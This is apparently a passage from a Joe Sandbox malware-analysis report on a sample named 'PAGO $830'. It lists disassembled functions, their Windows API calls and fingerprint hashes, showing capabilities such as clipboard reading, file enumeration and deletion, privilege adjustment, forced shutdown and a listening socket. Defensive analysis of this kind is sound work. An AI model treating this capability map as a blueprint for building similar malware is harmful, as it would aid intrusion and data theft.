                                                          • GetProcessWindowStation.USER32 ref: 00DD122E
                                                          • SetProcessWindowStation.USER32(00000000), ref: 00DD1238
                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DD1254
                                                            • Part of subcall function 00DD1003: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DD1140), ref: 00DD1018
                                                            • Part of subcall function 00DD1003: CloseHandle.KERNEL32(?,?,00DD1140), ref: 00DD102D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                          • String ID: $default$winsta0
                                                          • API String ID: 22674027-1027155976
                                                          • Opcode ID: 2c014a567e9e7f4b3e5ca0c8b08f3d6f4671825d042322adf8b5a35e2021e3e3
                                                          • Instruction ID: 472977e81d1a402a318cd378e59c32d1c0c7274266bf404686df78d4934e4b4b
                                                          • Opcode Fuzzy Hash: 2c014a567e9e7f4b3e5ca0c8b08f3d6f4671825d042322adf8b5a35e2021e3e3
                                                          • Instruction Fuzzy Hash: 0D816DB5900209BFDF259FA5DC49BEE7BB8EF44700F18412AF911B62A0D7768985CB70
                                                          Function 00DD0AA6 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DD103D: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1058
                                                            • Part of subcall function 00DD103D: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD1064
                                                            • Part of subcall function 00DD103D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD1073
                                                            • Part of subcall function 00DD103D: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD107A
                                                            • Part of subcall function 00DD103D: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD1091
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DD0B10
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DD0B44
                                                          • GetLengthSid.ADVAPI32(?), ref: 00DD0B5B
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00DD0B95
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DD0BB1
                                                          • GetLengthSid.ADVAPI32(?), ref: 00DD0BC8
                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DD0BD0
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00DD0BD7
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DD0BF8
                                                          • CopySid.ADVAPI32(00000000), ref: 00DD0BFF
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DD0C2E
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DD0C50
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DD0C62
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0C89
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0C90
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0C99
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0CA0
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0CA9
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0CB0
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD0CBC
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0CC3
                                                            • Part of subcall function 00DD10D7: GetProcessHeap.KERNEL32(00000008,00DD0AF5,?,00000000,?,00DD0AF5,?), ref: 00DD10E5
                                                            • Part of subcall function 00DD10D7: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DD0AF5,?), ref: 00DD10EC
                                                            • Part of subcall function 00DD10D7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DD0AF5,?), ref: 00DD10FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                          • String ID:
                                                          • API String ID: 4175595110-0
                                                          • Opcode ID: a7f9334530995c963768f7cfa647bf5e0fc39d6a095ba25edbd3b0a21f7132e2
                                                          • Instruction ID: e90376b128ffc469a2097483cacab266a6355fdeaf09c6ad0140b4a340cdd607
                                                          • Opcode Fuzzy Hash: a7f9334530995c963768f7cfa647bf5e0fc39d6a095ba25edbd3b0a21f7132e2
                                                          • Instruction Fuzzy Hash: F9713B72900209BFDF109FA9DC48FAEBBB8FF84350F184216E915B6291D7719989CB70
                                                          Function 00DEEA26 Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32(00E0D0D0), ref: 00DEEA50
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00DEEA5E
                                                          • GetClipboardData.USER32(0000000D), ref: 00DEEA6A
                                                          • CloseClipboard.USER32 ref: 00DEEA76
                                                          • GlobalLock.KERNEL32(00000000), ref: 00DEEAAE
                                                          • CloseClipboard.USER32 ref: 00DEEAB8
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00DEEAE3
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00DEEAF0
                                                          • GetClipboardData.USER32(00000001), ref: 00DEEAF8
                                                          • GlobalLock.KERNEL32(00000000), ref: 00DEEB09
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00DEEB49
                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 00DEEB5F
                                                          • GetClipboardData.USER32(0000000F), ref: 00DEEB6B
                                                          • GlobalLock.KERNEL32(00000000), ref: 00DEEB7C
                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00DEEB9E
                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DEEBBB
                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DEEBF9
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00DEEC1A
                                                          • CountClipboardFormats.USER32 ref: 00DEEC3B
                                                          • CloseClipboard.USER32 ref: 00DEEC80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                          • String ID:
                                                          • API String ID: 420908878-0
                                                          • Opcode ID: cdb19343cbe5e3a3032cf52e71eb4c103dda13d7e9a6a149186c9a981034da42
                                                          • Instruction ID: db487c5fd342268f4347ddfae04b4a0a3a7f177f694f8c1957fbac59712cee36
                                                          • Opcode Fuzzy Hash: cdb19343cbe5e3a3032cf52e71eb4c103dda13d7e9a6a149186c9a981034da42
                                                          • Instruction Fuzzy Hash: 0E61A0302043419FD310EF66D895F2A77A4FF84708F28865DF49A972A2DB72D949CB72
                                                          Function 00DE68AD Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00DE68DC
                                                          • FindClose.KERNEL32(00000000), ref: 00DE6930
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DE696C
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DE6993
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DE69D0
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DE69FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                          • API String ID: 3830820486-3289030164
                                                          • Opcode ID: b82a9002ff8aa488c2ff0f8641af6905c108e5dabe10a2334da24d7cababe5b0
                                                          • Instruction ID: 8d25c3938c1b2d174187a8319b17774c43341d1c0bb20b755fa5c56927bd0d53
                                                          • Opcode Fuzzy Hash: b82a9002ff8aa488c2ff0f8641af6905c108e5dabe10a2334da24d7cababe5b0
                                                          • Instruction Fuzzy Hash: F4D15F72508340AEC310EFA5C885EABB7ECEF88714F44491EF589D6191EB75DA48CB72
                                                          Function 00DE9560 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00DE9581
                                                          • GetFileAttributesW.KERNEL32(?), ref: 00DE95BF
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00DE95D9
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00DE95F1
                                                          • FindClose.KERNEL32(00000000), ref: 00DE95FC
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00DE9618
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE9668
                                                          • SetCurrentDirectoryW.KERNEL32(00E36B80), ref: 00DE9686
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE9690
                                                          • FindClose.KERNEL32(00000000), ref: 00DE969D
                                                          • FindClose.KERNEL32(00000000), ref: 00DE96AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*
                                                          • API String ID: 1409584000-438819550
                                                          • Opcode ID: 902237dba29dc71d407bc972d14c150184ab73652f549a2ee214c71e6ab5fff5
                                                          • Instruction ID: 0f78945fb5789d427dedb05d0118e742484179c5f8051cfddfa6de781f06d8d1
                                                          • Opcode Fuzzy Hash: 902237dba29dc71d407bc972d14c150184ab73652f549a2ee214c71e6ab5fff5
                                                          • Instruction Fuzzy Hash: 3731B2316027596EDB20BBB6EC58ADEB7AC9F45320F244166E854F20A0EB75D9858B30
                                                          Function 00D8B728 Relevance: 18.4, Strings: 14, Instructions: 881COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                          • API String ID: 0-4052911093
                                                          • Opcode ID: 924ebc77a80b3562ddc900cfb195366dfe38b6b0a54c5808ae99e6e58e4e84aa
                                                          • Instruction ID: 5959f4dddb02a5109b7b69dda053bd89908a51e39d59935781bf33ac576cb188
                                                          • Opcode Fuzzy Hash: 924ebc77a80b3562ddc900cfb195366dfe38b6b0a54c5808ae99e6e58e4e84aa
                                                          • Instruction Fuzzy Hash: 13727071E0021A9BDB24DF59C881FBEB7B5EF84310F14816AE445EB295EB709D81DFA0
                                                          Function 00DE96BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00DE96DC
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00DE9737
                                                          • FindClose.KERNEL32(00000000), ref: 00DE9742
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00DE975E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE97AE
                                                          • SetCurrentDirectoryW.KERNEL32(00E36B80), ref: 00DE97CC
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE97D6
                                                          • FindClose.KERNEL32(00000000), ref: 00DE97E3
                                                          • FindClose.KERNEL32(00000000), ref: 00DE97F3
                                                            • Part of subcall function 00DDDA03: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DDDA1E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*
                                                          • API String ID: 2640511053-438819550
                                                          • Opcode ID: c4e929551c85308a94506fea983b567751844d59e4b86299ea83ab368f390267
                                                          • Instruction ID: 8db97238fc3048f1de2bac552447dd1974b84fd44aafca416249b605d4b7ed8f
                                                          • Opcode Fuzzy Hash: c4e929551c85308a94506fea983b567751844d59e4b86299ea83ab368f390267
                                                          • Instruction Fuzzy Hash: 5131B2316027596ECF10BFB6EC58ADEB7AC9F05360F244165E850B21A1DB71DE89CB70
                                                          Function 00DAB8F2 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370timeCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00DAB974
                                                          • _free.LIBCMT ref: 00DAB998
                                                          • _free.LIBCMT ref: 00DABB1F
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00E13720), ref: 00DABB31
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00E4121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00DABBA9
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00E41270,000000FF,?,0000003F,00000000,?), ref: 00DABBD6
                                                          • _free.LIBCMT ref: 00DABCEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                          • String ID: 7$ 7
                                                          • API String ID: 314583886-2298233292
                                                          • Opcode ID: b3fbc6ff9283a369885823f47e8d71d7ac78546e8ee6390f1628b19b724e261c
                                                          • Instruction ID: fa1464907f21c0bcce238ae127c88f20d46864057a14adf816f1a050d665b637
                                                          • Opcode Fuzzy Hash: b3fbc6ff9283a369885823f47e8d71d7ac78546e8ee6390f1628b19b724e261c
                                                          • Instruction Fuzzy Hash: 33C105719002459FDB209F799841BAA7BA9EF43330F18419BE495E7253EB708E83CB74
                                                          Function 00DE80B3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 00DE8175
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DE8185
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DE8191
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DE822E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8242
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8274
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DE82AA
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE82B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                          • String ID: *.*
                                                          • API String ID: 1464919966-438819550
                                                          • Opcode ID: 4270a2a00133ef131fce80a21db40ea2e0727e4fa138fc0f160177a116c25ca5
                                                          • Instruction ID: 0d6a429443690be9dc9f23cb34b6dbce1c0176ff998f4ed0b72529a430ffc49b
                                                          • Opcode Fuzzy Hash: 4270a2a00133ef131fce80a21db40ea2e0727e4fa138fc0f160177a116c25ca5
                                                          • Instruction Fuzzy Hash: 09616A72504745AFCB10EF61C8449AEB3E8FF89310F04892EF98997251EB31E945CBB2
                                                          Function 00DDCF94 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D7592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D75922,?,?,00D748AA,?,?,?,00000000), ref: 00D7594D
                                                            • Part of subcall function 00DDE0B7: GetFileAttributesW.KERNEL32(?,00DDCEB3), ref: 00DDE0B8
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00DDD040
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00DDD0FB
                                                          • MoveFileW.KERNEL32(?,?), ref: 00DDD10E
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DDD12B
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDD155
                                                            • Part of subcall function 00DDD1BA: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00DDD13A,?,?), ref: 00DDD1D0
                                                          • FindClose.KERNEL32(00000000,?,?,?), ref: 00DDD171
                                                          • FindClose.KERNEL32(00000000), ref: 00DDD182
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 1946585618-1173974218
                                                          • Opcode ID: 7a50af527ac217bc72cb0d92178453cf34679489ebc632c578a760bd0484ebf3
                                                          • Instruction ID: 47e6a249cd863e8759dc1f475c3dca83ac66750cc2dae15d4508c613cddf28f8
                                                          • Opcode Fuzzy Hash: 7a50af527ac217bc72cb0d92178453cf34679489ebc632c578a760bd0484ebf3
                                                          • Instruction Fuzzy Hash: 1E615D3180124DAECF05EBE0DA529EDBBB6EF15304F648166E405772A2EB716F09CB71
                                                          Function 00DEEC91 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: dd6eed0f11528a18edbccafe237a1dd6bf44b618c8429c9ea8025be9a64302ad
                                                          • Instruction ID: c04cb30633599359ef38f2f54f96f86dcfe4c805afd7db075636bb6c02501049
                                                          • Opcode Fuzzy Hash: dd6eed0f11528a18edbccafe237a1dd6bf44b618c8429c9ea8025be9a64302ad
                                                          • Instruction Fuzzy Hash: 1741C235604641EFD720DF16E888F197BE1EF44318F28C599E4698B762D772EC86CBA0
                                                          Function 00DDE814 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DD1607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD1651
                                                            • Part of subcall function 00DD1607: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD167E
                                                            • Part of subcall function 00DD1607: GetLastError.KERNEL32 ref: 00DD168E
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00DDE850
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $ $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-3163812486
                                                          • Opcode ID: 8b6fdbe051724df92090f5098c0ddbb32c079297f7f38a58fd8377076ddc1772
                                                          • Instruction ID: b5499e681914d2e8b2a1b7bf1eb2043c40d77051471fe544bdcae4f2e5396b99
                                                          • Opcode Fuzzy Hash: 8b6fdbe051724df92090f5098c0ddbb32c079297f7f38a58fd8377076ddc1772
                                                          • Instruction Fuzzy Hash: 3601A2766503217AE72432B4AC89BBE775CDB54341F294622FD42E62D1C5619C44A1B0
                                                          Function 00DF112B Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DF119D
                                                          • WSAGetLastError.WSOCK32 ref: 00DF11AA
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00DF11E1
                                                          • WSAGetLastError.WSOCK32 ref: 00DF11EC
                                                          • closesocket.WSOCK32(00000000), ref: 00DF121B
                                                          • listen.WSOCK32(00000000,00000005), ref: 00DF122A
                                                          • WSAGetLastError.WSOCK32 ref: 00DF1234
